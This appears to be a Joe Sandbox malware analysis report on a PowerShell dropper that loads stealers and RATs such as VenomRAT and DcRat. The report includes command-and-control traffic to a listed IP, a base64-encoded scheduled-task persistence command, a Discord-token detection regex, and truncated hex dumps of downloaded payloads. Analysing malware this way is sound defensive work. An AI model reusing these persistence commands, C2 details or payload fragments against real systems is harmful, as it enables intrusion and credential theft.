Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
vfrcxq.ps1

Overview

General Information

Sample name:vfrcxq.ps1
Analysis ID:1582972
MD5:0cdc732f0ded614eb23c08213bcf1e04
SHA1:0cbca39b7b1a0ec9b930c38c1c60d50feed74ee3
SHA256:7e129f68ebb1e8730941dcf50344e256bd0e32f29cac0e641426b88a17e131c6
Tags:147-45-44-131bookingps1SPAM-ITAuser-JAMESWT_MHT
Infos:

Detection

AveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected AveMaria stealer
Yara detected BrowserPasswordDump
Yara detected DcRat
Yara detected Keylogger Generic
Yara detected Powershell download and execute
Yara detected StormKitty Stealer
Yara detected Strela Stealer
Yara detected VenomRAT
.NET source code contains very large strings
.NET source code references suspicious native API functions
AI detected suspicious sample
Compiles code for process injection (via .Net compiler)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Suspicious execution chain found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: Use Short Name Path in Command Line
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 6372 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\vfrcxq.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 2356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • csc.exe (PID: 6936 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ewvozk4a\ewvozk4a.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • cvtres.exe (PID: 3172 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES1079.tmp" "c:\Users\user\AppData\Local\Temp\ewvozk4a\CSC39309A05426E407FA26B11E6D0D7414D.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • svchost.exe (PID: 6936 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • RegAsm.exe (PID: 7356 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Ave Maria, AveMariaRAT, avemariaInformation stealer which uses AutoIT for wrapping.
  • Anunak
https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria
NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, 404KeyLogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
NameDescriptionAttributionBlogpost URLsLink
Cameleon, StormKittyPWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapWindows_Trojan_DCRat_1aeea1acunknownunknown
  • 0x2818e2:$a1: havecamera
  • 0x2d386c:$a2: timeout 3 > NUL
  • 0x2d706d:$a3: START "" "
  • 0x2d75c8:$a3: START "" "
  • 0x2d745d:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g
  • 0x2d7540:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
dump.pcapINDICATOR_SUSPICIOUS_EXE_Discord_RegexDetects executables referencing Discord tokens regular expressionsditekSHen
  • 0x2db77c:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}|mfa\.[a-zA-Z0-9_\-]{84}
dump.pcapMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
  • 0x2d2f2c:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }}
  • 0x2cea6c:$s6: VirtualBox
  • 0x2dfca1:$s6: VirtualBox
  • 0x2db0e2:$s8: Win32_ComputerSystem
  • 0x2dfc07:$s8: Win32_ComputerSystem
  • 0x2d7e22:$s9: Win32_Process Where ParentProcessID=
  • 0x2d7adc:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x2d7bf1:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x2d7cd9:$cnc4: POST / HTTP/1.1

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.3687725742.0000000002C54000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DcRat_2Yara detected DcRatJoe Security
    00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VenomRATYara detected VenomRATJoe Security
      00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_BrowserPasswordDump_1Yara detected BrowserPasswordDumpJoe Security
          00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Keylogger_Generic_3Yara detected Keylogger GenericJoe Security
            Click to see the 42 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.powershell.exe.219ace53b18.5.raw.unpackMALWARE_Win_StormKittyDetects StormKitty infostealerditekSHen
            • 0x5c8:$x2: https://github.com/LimerBoy/StormKitty
            • 0x5e4:$x3: StormKitty
            0.2.powershell.exe.219ace4d6e0.7.raw.unpackMALWARE_Win_StormKittyDetects StormKitty infostealerditekSHen
            • 0x6a00:$x2: https://github.com/LimerBoy/StormKitty
            • 0x6a1c:$x3: StormKitty
            0.2.powershell.exe.219ab9e88f8.2.raw.unpackMALWARE_Win_StormKittyDetects StormKitty infostealerditekSHen
            • 0x5c8:$x2: https://github.com/LimerBoy/StormKitty
            • 0x5e4:$x3: StormKitty
            0.2.powershell.exe.219acd82cf6.0.raw.unpackMALWARE_Win_StormKittyDetects StormKitty infostealerditekSHen
            • 0x5c8:$x2: https://github.com/LimerBoy/StormKitty
            • 0x5e4:$x3: StormKitty
            0.2.powershell.exe.219ab9a4e58.4.raw.unpackMALWARE_Win_StormKittyDetects StormKitty infostealerditekSHen
            • 0x44068:$x2: https://github.com/LimerBoy/StormKitty
            • 0x44084:$x3: StormKitty
            Click to see the 116 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Change PowerShell Policies to an Insecure Level
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\vfrcxq.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\vfrcxq.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\vfrcxq.ps1", ProcessId: 6372, ProcessName: powershell.exe
            Sigma detected: Dynamic .NET Compilation Via Csc.EXE
            Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ewvozk4a\ewvozk4a.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ewvozk4a\ewvozk4a.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\vfrcxq.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6372, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ewvozk4a\ewvozk4a.cmdline", ProcessId: 6936, ProcessName: csc.exe
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup, CommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\vfrcxq.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6372, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup, ProcessId: 6936, ProcessName: svchost.exe
            Sigma detected: Use Short Name Path in Command Line
            Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES1079.tmp" "c:\Users\user\AppData\Local\Temp\ewvozk4a\CSC39309A05426E407FA26B11E6D0D7414D.TMP", CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES1079.tmp" "c:\Users\user\AppData\Local\Temp\ewvozk4a\CSC39309A05426E407FA26B11E6D0D7414D.TMP", CommandLine|base64offset|contains: 8c, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ewvozk4a\ewvozk4a.cmdline", ParentImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentProcessId: 6936, ParentProcessName: csc.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES1079.tmp" "c:\Users\user\AppData\Local\Temp\ewvozk4a\CSC39309A05426E407FA26B11E6D0D7414D.TMP", ProcessId: 3172, ProcessName: cvtres.exe
            Sigma detected: Dynamic CSharp Compile Artefact
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6372, TargetFilename: C:\Users\user\AppData\Local\Temp\ewvozk4a\ewvozk4a.cmdline
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\vfrcxq.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\vfrcxq.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\vfrcxq.ps1", ProcessId: 6372, ProcessName: powershell.exe

            Data Obfuscation

            barindex
            Sigma detected: Dot net compiler compiles file from suspicious location
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ewvozk4a\ewvozk4a.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ewvozk4a\ewvozk4a.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\vfrcxq.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6372, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ewvozk4a\ewvozk4a.cmdline", ProcessId: 6936, ProcessName: csc.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-01T08:54:11.081677+010028424781Malware Command and Control Activity Detected157.20.182.1774449192.168.2.749701TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\ewvozk4a\ewvozk4a.dllAvira: detection malicious, Label: HEUR/AGEN.1300034
            Multi AV Scanner detection for submitted file
            Source: vfrcxq.ps1ReversingLabs: Detection: 13%
            Yara detected AveMaria stealer
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6372, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7356, type: MEMORYSTR
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\ewvozk4a\ewvozk4a.dllJoe Sandbox ML: detected
            Source: Binary string: ;C:\Users\user\AppData\Local\Temp\ewvozk4a\ewvozk4a.pdb source: powershell.exe, 00000000.00000002.1283601445.00000219ACD98000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\ewvozk4a\ewvozk4a.pdb source: powershell.exe, 00000000.00000002.1317149566.00000219C381B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\ewvozk4a\ewvozk4a.pdb` source: powershell.exe, 00000000.00000002.1317149566.00000219C381B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\Backup\Venom RAT + HVNC Finally Released 12.03.2024 Fixed Logger\HVNCDll\obj\Release\hvnc.pdb] source: powershell.exe, 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmp
            Source: Binary string: D:\Backup\Venom RAT + HVNC Finally Released 12.03.2024 Fixed Logger\HVNCDll\obj\Release\hvnc.pdb source: powershell.exe, 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmp
            Source: Binary string: ;C:\Users\user\AppData\Local\Temp\ewvozk4a\ewvozk4a.pdbhP source: powershell.exe, 00000000.00000002.1283601445.00000219ACD98000.00000004.00000800.00020000.00000000.sdmp
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior

            Software Vulnerabilities

            barindex
            Suspicious execution chain found
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 157.20.182.177:4449 -> 192.168.2.7:49701
            Yara detected Generic Downloader
            Source: Yara matchFile source: 0.2.powershell.exe.219bbf8cb0a.11.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.219bb89f062.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.219bbb6b348.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.219bbc8f0d2.10.raw.unpack, type: UNPACKEDPE
            Source: global trafficTCP traffic: 192.168.2.7:49701 -> 157.20.182.177:4449
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 01 Jan 2025 07:54:04 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Sat, 28 Dec 2024 19:39:12 GMTETag: "8e00-62a59bbda5efb"Accept-Ranges: bytesContent-Length: 36352Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7b 38 bc c7 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 84 00 00 00 08 00 00 00 00 00 00 1a a3 00 00 00 20 00 00 00 c0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c8 a2 00 00 4f 00 00 00 00 c0 00 00 d0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 0c 00 00 00 ac a2 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 20 83 00 00 00 20 00 00 00 84 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 05 00 00 00 c0 00 00 00 06 00 00 00 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 00 00 00 02 00 00 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc a2 00 00 00 00 00 00 48 00 00 00 02 00 05 00 44 22 00 00 68 80 00 00 03 00 02 00 06 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 05 00 a9 00 00 00 01 00 00 11 73 0f 00 00 0a 0a 73 10 00 00 0a 0b 07 28 11 00 00 0a 03 6f 12 00 00 0a 6f 13 00 00 0a 0c 06 08 6f 14 00 00 0a 06 17 6f 15 00 00 0a 06 18 6f 16 00 00 0a 1f 10 8d 1c 00 00 01 0d 02 16 09 16 09 8e 69 28 17 00 00 0a 06 09 6f 18 00 00 0a 02 8e 69 09 8e 69 59 8d 1c 00 00 01 13 04 02 09 8e 69 11 04 16 11 04 8e 69 28 17 00 00 0a 06 6f 19 00 00 0a 13 05 11 05 11 04 16 11 04 8e 69 6f 1a 00 00 0a 13 06 de 20 11 05 2c 07 11 05 6f 1b 00 00 0a dc 07 2c 06 07 6f 1b 00 00 0a dc 06 2c 06 06 6f 1b 00 00 0a dc 11 06 2a 00 00 00 01 28 00 00 02 00 74 00 12 86 00 0c 00 00 00 00 02 00 0c 00 86 92 00 0a 00 00 00 00 02 00 06 00 96 9c 00 0a 00 00 00 00 13 30 02 00 19 00 00 00 02 00 00 11 02 28 1c 00 00 0a 03 28 01 00 00 06 0a 28 11 00 00 0a 06 6f 1d 00 00 0a 2a 1e 02 28 1e 00 00 0a 2a 00 00 00 13 30 07 00 9e 00 00 00 03 00 00 11 72 01 00 00 70 0a 73 1f 00 00 0a 73 20 00 00 0a 0b 07 6f 2
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 01 Jan 2025 07:54:05 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Sat, 28 Dec 2024 19:34:32 GMTETag: "2fdc00-62a59ab2b1730"Accept-Ranges: bytesContent-Length: 3136512Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6e 66 5c 67 00 00 00 00 00 00 00 00 e0 00 02 00 0b 01 08 00 00 ca 2f 00 00 10 00 00 00 00 00 00 be e8 2f 00 00 20 00 00 00 00 30 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 30 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 70 e8 2f 00 4b 00 00 00 00 00 30 00 f7 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 30 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 c8 2f 00 00 20 00 00 00 ca 2f 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f7 0d 00 00 00 00 30 00 00 0e 00 00 00 cc 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 30 00 00 02 00 00 00 da 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 e8 2f 00 00 00 00 00 48 00 00 00 02 00 05 00 18 00 14 00 58 e8 1b 00 01 00 00 00 c5 08 00 06 18 47 12 00 fe b8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c c3 df 8f 3c 11 bd ff 34 87 b1 23 14 56 06 77 83 64 21 f6 ae ea 92 48 41 5a d4 f4 e9 cb 91 b0 af f6 49 f6 31 fe 0b 17 da cb 0b c6 59 cd b0 54 38 44 e3 bf 63 5b db 81 ef 32 94 82 dc bc a4 15 ec 6e 6a 6c 4f ca 73 5d 79 78 af 3c 8f 6d 74 38 2a ad 8e 04 fd f1 d9 42 ea a1 c0 ca 2d 1d 1e 72 49 18 a3 ca 67 a3 fa 83 3a fe 6d c8 00 65 80 c0 b1 cd 1f 89 87 cf a0 e4 6a 7b 55 6d 37 ff 10 39 99 3b 0d 11 ce 24 89 51 57 a9 9a d9 1e d7 41 41 30 56 30 79 d5 68 60 34 62 45 eb b4 89 3d f7 f7 b8 57 00 07 80 c2 18 00 be 4d 9a 26 2c 91 ed 43 ae 09 85 03 3a f6 5d 29 17 23 eb cb 6c ab 41 47 38 e9 42 0d ca 33 4f 29 3b 81 c3 22 e3 f2 4c ad 22 f7 8c 70 ee f5 a1 3c 31 7f 39 3b e3 59 46 98 20 f2 38 66 ea 4b 3f 12 e4 df 04 93 83 92 d6 9e 57 45 77 e8 3a c3 37 69 28 7d 08 d2 97 f4 6a 59 b3 32 a6 5d 75 7b e8 14 ac f8 91 31 43 fd e8 ad 72 7f fc a1 db 68 a8 fe 3a bf 62 e4 a1 05 9f af 76 4a fb 0a d0 aa c3 01 8b a1 6e db ab 11 